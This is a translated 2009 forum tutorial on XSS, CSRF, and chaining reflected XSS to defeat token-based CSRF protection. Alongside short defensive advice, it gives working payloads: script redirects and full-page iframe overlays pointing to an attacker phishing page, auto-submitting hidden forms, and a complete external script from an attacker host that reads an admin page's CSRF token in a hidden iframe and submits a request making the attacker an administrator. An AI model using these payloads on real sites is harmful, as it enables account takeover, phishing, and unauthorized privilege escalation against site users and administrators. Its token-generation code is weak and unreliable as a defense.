Using XSS to bypass CSRF protection

<?php

// Autor: Nytro

// Contact: nytro_rst@yahoo.com

// Translated by: SENEQ_o

// Published on: 28 Octombrie 2009

// Romanian Security Team

?>

1) About XSS

2) About CSRF

3) Using XSS to bypass CSRF protection

Hello, in this tutorial I will teach you how to use XSSto bypass

CSRF protection. If you are familiar to XSS and CSRFterms you can skip the first two

chapters, but I recommend you read them.

Warning! This tutorial was written for educationalpurposes only ,and I take no

responsibility for your acts.

About XSS ( Cross Site Scripting )

XSS is probably the most common web vulnerability .Thisvulnerability, affects the

client , more precisely the user of the buggedapplication. It is not so dangerous , but it

can lead to many problems .Many websites have thisproblem , but they don’t have to

worry because there are little who use the exploit.

The main idea is simple .The web application receivesdata from the client , usually

from the GET function and then displays it .For example:

if(isset($_GET['text']))

{

$var = $_GET['text'];

print $var;

}

1

For a request such as:

http://www.site.com/script.php?text=test

what will be displayed is "test" . But what happens whensomebody makes the following

request:

http://www.site.com/script.php?text=<script>cod_javascript</script>

Well, the javascript code will be executed . Maybe you’rewondering: Why would

the attacker run the javascript code using GET ( whencould just type it in the browser:

javascript:code_javascript;). Well, the code is notdesigned for him. He can use the link:

http://www.site.com/script.php?text=<script>cod_javascript</script>

to send it to someone, to access it , and the javascriptcode will run on the victim’s

computer.

Most often, this problem is found in the search box ,regardless if the files are send

using POST, or send by GET , the return message will besomething like: "You searched

for ‘test’", but if the request is:

http://www.site.com/script.php?text=<script>cod_javascript</script>

the thing displayed will be: "You searched for ''" and the javascript codewill be ran.

But what can be done with that code, how harmful can itbe?

Well, there are plenty of things to do. For example, thepopularity behind XSS, is the

cookie stealing.

As you all know, having the cookies of a victim which islogged on an website, you

can use them to log yourself on that website using thevictim account. This can be easily

done using a cookie grabber.

A cookie grabber is a PHP file which receives data using GET( it can also receive

data using POST ) and writes it in a file on the attacker’s server.It is necessary that the

script runs on the bugged application, because if it runson other application,

document.cookie will not return the cookies we want. But thisis not what I planned to

2

cover in this tutorial, you will find plenty ofinformation about this.

XSS can be also used for phishing, for stealingauthentication information from

the victim, just as simple:

The attacker offers a link to the victim, such as:

http://www.site.com/script.php?text=<script>document.location.href=

"http://www.site-attacker.com/phishing.html"</script>

the victim is redirected to the phishing page(scam page),logs on the page , and the

attacker steals the private data. This can also be doneusing <iframe>. For example:

<iframe

src="http://attacker.com/phishing_page_identical_copy_of_the_aplication_page.h

tml" style="z-index: 0; position: absolute; top: 0;left: 0; height: 100%; width:

100%;"></iframe>

It is very easy, using CSS, we create an iframe whichcovers all the page.When the

user sees that the link is “ok”,he logs on.

The problem with this vulnerability is that the link is “ok”. So the

victim is possible no know if the is a problem or not. Ofcourse, she can figure it out from

the query, but it can be encrypted.

Usually, if you want to know if a website is vulnerable,you can use:

<script>alert(1)</script> or "><script>alert(1)</script>

Well, the are many possibilities depending on the browseryou use. You can find a

big list here: http://ha.ckers.org/xss.html

You can also use XSS to make "a page cooler", for fun. Forexample, visit

www.alonia.ro and in the search box type:

<script>document.images[4].src="http://rstcenter.com/up/director/RST.png"</script> .

There are many things that can be done. You will seelater, how to bypass CSRF

filters.

3

In order to get rid of this problem, you have to get ridof the <> characters.

To the PHP programmers I recommend htmlspecialcharsfunction

(or htmlentities ) with the second parameterENT_QUOTES.Both functions convert ">"

to "&gt;" and "<" to "&lt;" , and if you use it withthe second parameter ENT_QUOTES,

the function will transform in HTML entities even the (") and (').Thereby , for a request

such as:

http://site.com/script.php?text=<script>alert('1')</script>

in the source it will be displayed

&lt;script&gt;alert('1')&lt;/script&gt;

but the text will be

<script>alert('1')</script>

and you will have no problems whatsoever. I alsorecommend using the second parameter

, because it can release you from many problems.

The code should look something like this:

if(isset($_GET['text']))

{

$var= $_GET['text'];

print htmlentities($var, ENT_QUOTES);

// Or print htmlspecialchars($var, ENT_QUOTES);

}

You may ask yourself if a XSS can be exploited , and ifthe data is send using

POST. The answer is yes and no. If the data is send usingPOST, the victim can not be

directly attacked , it can’t just click on the linkand that’s all, so we can say the XSS can’t be

exploited. But the victim can access an random page madeby the attacker , and that page

will send the malicious code using POST to the vulnerableWeb application page. For

example:

<form style="display: none;" method="post" action="http://www.alonia.ro/search">

<input type="hidden" name="searchStr" value="<script>alert(1)</script>"/>

4

<input name="send" type="submit" id="send" />

</form>

<script>

document.forms[0].send.click();

</script>

The idea is simple: we create an form as the one of thebugged application (make

sure the name of the fields are the same) and wepractically automate a search, we

practically put into effect that query, thereby sendingdata through POST, so the victim is

redirected towards our page, and the javascript code isexecuted.

About CSRF (Cross Site Request Forgery)

CSRF is a common vulnerability because little know aboutit. It effects

the client just as the XSS, more precisely, both XSS andCSRF target the users of Web

applications.

What makes this vulnerability possible is the automationof an action, this action

being made in general by the application administrators.For this type of vulnerability, the

victims are authenticated users of the application , andCSRF lets them automate some

actions that they can do.

For example , an administrator , in the administrationpanel , he has a page were

he can delete an article , just by clicking on a link.For example:

http://www.site.com/admin/delete_articol?articol_id=123

The attacker can make a page in which he can put thefollowing code:

<iframe

src="http://www.site.com/admin/delete_articol?articol_id=123"width="0"

height="0"></iframe>

When the victim ,in our case the administrator visitsthis webpage ,he will make a

request to

http://www.site.com/admin/delete_articol?articol_id=123

5

without knowing , and he will delete the article with hisdatabase id. Of course , the id can

be sent using POST, from an form , but the attacker cancopy that form and can send that

data using javascript:

document.forms[0].trimite.click();

This is the main idea. It is very easy for an applicationto be protected by this

problem, and we can enumerate some methods. The most usedmethod, and a very good

one, is using tokens, some strings which can be generatedrandomly and which are kept in

sessions, at the time we log in.

if(isset($_POST['login']))

{

// Check login

$_SESSTION['token'] = Random();

}

I use this function, it has some flaws, but it does whatI what it to do, and I can

specify what characters I want in the token and it’s length.

function Random()

{

$chars =

array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','

Z','a

','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','

6','

7','8','9');

shuffle($chars);

$sir = substr(implode('', $chars), 0, 10);

return $sir;

}

We can use these tokens for verifying if a request istruly used by the person itself

and not by the CSRF.I should better give an example. Forexample, when deleting a file,

when we create the download link, we add this token:

print '<a href="admin.php?action=delete_articol&articol_id'. $date['id'] . '&token=' .

$_SESSION['token'] . '">Delete</a>';

6

Therefore, the link for the delete will be somethinglike:

http://www.site.com/admin.php?action=delete_articol&articol_id=123&to

ken=qdY4f6FTpO

All we need to verify before the action , in our case fordeleting the article ,is if the

token is equal to the one from the session:

if(isset($_GET['delete_articol']))

{

if($_SESSION['token'] == $_GET['token'])

{

// delete_specified_article();

}

else print 'The token does not match, you may be a victimon CSRF';

}

Thereby, the attacker will never know this token and hewill not be able to create a

valide link to delete the article. Other methods, saferbut more "time consuming" would be

to ask for users/administrator password for everyimportant action , or to add a

CAPTCHA image and verify the text entered by the user.

3) Using XSS for bypassing CSRF protection

Well, now we go to the important part, how to use XSS tobypass CSRF protection.

This technique applies to those websites, who have anapplication guarded by CSRF, and

another page which is vulnerable to XSS. Using that XSSwe can bypass the CSRF

protection and we can automate any action that anybodycan do on the application

without problems.

For example, one website has a little application on themain page which is

vulnerable to XSS, and a forum on /forum which is notvulnerable to CSRF. We will se

how we can use that XSS to bypass CSRF protection of theforum. As I said earlier, there

are many methods to prevent CSRF, but the most used isthat of tokens and hidden fields

(<input type="hidden" name="token" value="<?php print $_SESSION['token']; ?>" /> )

which are verified before the action is executed. We willtry to pass this type of protection,

so as we have time to do what we really want.

Lets start with the base idea, how to pass CSRFprotection, because we do not

7

know the that token. The solution is piece of cake, wefind it, and we can do this very

easily using javascript. Let’s take anexample, adding a new administrator depending on

the name of the user who will become administrator. Thiswill happen in the folder

/admin which is not vulnerable to CSRF:

/admin/admin.php?action=add_admin ( for example... ):

<form method="get" action="add_admin.php">

Name: <input type="text" name="name" value="" /><br />

<input type="hidden" name="token" value="<?php print $_SESSION['token']; ?>" />

<input type="submit" name="submit" value="add admin" /><br />

</form>

Well, this script adds an administrator. When the buttonis clicked the main

admin will make a request such as:

http://www.site.com/add_admin.php?name=Nytro&token=1htFI0iA9s&submit

When verifying,the token from the session will be thesame with the one send

from the form , and nitro will be an administrator.

<?php

session_start();

if(isset($_GET['submit']))

{

if($_SESSION['token'] == $_GET['token'])

{

// we_make_nytro_admin();

print 'Nytro is now an admin.';

}

else print 'Token invalid _|_ :)';

}

?>

Now let’s see what we can do to obtain thattoken. I will use as a method the GET

function, in examples, so as to be easier to understand,but you could apply as well the

POST function for data being sent.

8

We will consider on the main page (index.php), the vulnerableapplication which

contains the following code:

index.php:

<?php

if(isset($_GET['name']))

{

print 'Hello, ' . $_GET['name'];

}

?>

To simplify things, we won’t write our javascript codedirectly in the request ,

instead we will write it in a .js file which we willconsider uploaded on:

http://www.attacker.com/script.js

In request we will use:

http://www.site_vulnerabil.com/index.php?nume=<script

src="http://www.atacator.com/script.js"></script>

So lets see how we can find out the token usingjavascript. Very easy! We will use a

simple <iframe> in which we will open the page fromwhich the CSRF request is being

made (/admin/admin.php?action=add_admin)and we will read it. Thenwe will want the

link and we will redirect the victim (administrator)towards it,or we will write it in an

<iframe>.

Lets do it.

Firstly, from our javascript code we will have to createour iframe, which will open

the administration page. Will put everything in afunction which we will call at the onload

event of the iframe so as to be sure that the page loaded.

document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin"

width="0" height="0" οnlοad="read()"></iframe>');

9

Then we are going to write read() function which readsthe token, and displays it

in an alert.

function read()

{

alert(document.getElementById("iframe").contentDocument.forms[0].token.value);

}

Thereby, we are going to use a request such as:

http://www.vulnerable_website.com/index.php?name=<script

src="http://www.attacker.com/script.js"></script>

where

http://www.attacker.com/script.js

is:

document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin"

width="0" height="0" οnlοad="read()"></iframe>');

function read()

{

alert(document.getElementById("iframe").contentDocument.forms[0].token.value);

}

There should be an alert with the token we want. All wehave to do is to create an

link with that token and redirect the user towards it.Wewill modify the read() function

for this:

document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin"

width="0" height="0" οnlοad="read()"></iframe>');

function read()

{

var name = 'Nytro';

var token =

10

document.getElementById("iframe").contentDocument.forms[0].token.value;

document.location.href = 'http://127.0.0.1/admin/add_admin.php?name='+ name +

'&token=' + token + '&submit';

}

Thereby, if the victim makes a request to:

http://site_victim.com/index.php?name=<scriptsrc="http://127.0.0.1/script.js></script>

it will be redirected to:

http://site_victim.com/admin/add_admin.php?name=Nytro&token=aH52G7jtC3&sub

mit

for example, and Nytro will be admin. In order the victimnot to realize he was victim to

such an attack we put everything in the iframe

<iframe src='http://site_victim.com/index.php?name=<script

src="http://127.0.0.1/script.js"></script>'width="300" height="300"></iframe>

Well this was the base idea. Things can complicate a lot.We can use XSS to obtain

administrator rights on a vBulletin or phpBB forum , butthings are becoming

complicated, if we would need to send the data 2 timesusing POST we should use an

iframe in a iframe and so on,so is no use to make it complicated,but keep in mind that it

is possible. Also, usually the data will have to be sentusing POST.No problem! Just read

the token as we read it earlier and create an form as theone of the page protected by

CSRF.In our example , instead of redirecting we willmodify the our script this way:

document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin"

width="0" height="0" οnlοad="read()"></iframe>');

function read()

{

var name = 'Nytro';

var token =

document.getElementById("iframe").contentDocument.forms[0].token.value;

document.writeln('<form width="0" height="0" method="post"

action="/admin/add_admin.php">');

document.writeln('<input type="text" name="name" value="' + name + '" /><br />');

11

document.writeln('<input type="hidden" name="token" value="' + token + '" />');

document.writeln('<input type="submit" name="submit" value="Add_admin" /><br

/>');

document.writeln('</form>');

document.forms[0].submit.click();

}

Be careful at the forms, at actions and inputs from theforms. It is a little tricky

using POST but it is possible. Now you may want to tryputting on the iframe another

page such as http://www.google.ro , or another websiteand do the same. Well it no

possible because of the browser, it won’t letyou, you will get "Permission denied". It won’t

allow access through a frame ( or anything else) to apage from another server ,because on

security measures (taken by Netscape a long time ago: ‘datacontamination’ ) .

Maybe it is complicated to create links or generatingforms… Actually you can do

this much easier. Even though it won’t work onall browsers, contentDocument can be

read only, on Mozilla it is not. How can it be easier?Create an iframe with the page that is

protected by CSRF, write the wanted name in form an pressclick on submit button. So,

our script, it doesn’t matter if the data willbe sent by GET or by POST , it will look like

this:

document.writeln('<iframe id="iframe" src="/admin/admin.php?actiune=add_admin"

width="0" height="0" οnlοad="read()"></iframe>');

function read()

{

var name = 'Nytro';

document.getElementById("iframe").contentDocument.forms[0].name.value = name;

// write name

document.getElementById("iframe").contentDocument.forms[0].submit.click(); //

Press click

}

What can be easier then this?

This was all , I hope you understand , and I hope you don’t applywhat you learned

.I repeat :I wrote this tutorial for educational purposeonly. If you have questions,

suggestions or if you found flaws contact me.

12

Have a good day!

Nytro @ Romanian Security Team [ http://www.rstcenter.com/forum/ ]

13

http://packetstorm.codar.com.br/papers/attack/Using_XSS_to_bypass_CSRF_protection.pdf